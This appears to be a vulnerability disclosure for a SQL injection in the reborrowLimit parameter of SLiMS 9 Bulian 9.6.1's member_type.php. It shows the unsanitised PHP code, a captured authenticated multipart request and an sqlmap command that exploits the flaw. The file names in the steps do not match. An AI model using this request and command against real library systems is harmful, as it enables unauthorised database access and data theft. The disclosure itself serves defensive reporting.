SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

**The Bug**

A SQL Injection has found in admin/modules/membership/member_type.php at the code below

    $data['member_type_name'] = $dbs->escape_string($memberTypeName);
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['enable_reserve'] = $_POST['enableReserve'];
    $data['reserve_limit'] = $_POST['reserveLimit'];
    $data['member_periode'] = $_POST['memberPeriode'];
    $data['reborrow_limit'] = $_POST['reborrowLimit'];
    $data['fine_each_day'] = $_POST['fineEachDay'];
    $data['grace_periode'] = $_POST['gracePeriode'];
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    

**To Reproduce**

Steps to reproduce the behavior:

1.  Login as admin or user that has access membership type
    
2.  Make sure the burp application is turned on to capture the request as screenshot below  
    
3.  Save the request in a separate file (sample.reg)  
    sample.reg example
    

    POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
    Host: localhost
    Content-Length: 1420
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
    Connection: close
    
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="csrf_token"
    
    29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberTypeName"
    
    abcdef
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanPeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="enableReserve"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reserveLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberPeriode"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reborrowLimit"
    
    4423
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="gracePeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="saveData"
    
    Update
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="updateRecordID"
    
    2
    ------WebKitFormBoundaryQUBKpazqdLdsHspa--
    
    
    

run the test with the following command:

    sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
    

5.  You've entered into the system  
    

**Screenshots**

**Versions**

*   OS: Windows
*   Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

Tag

#windows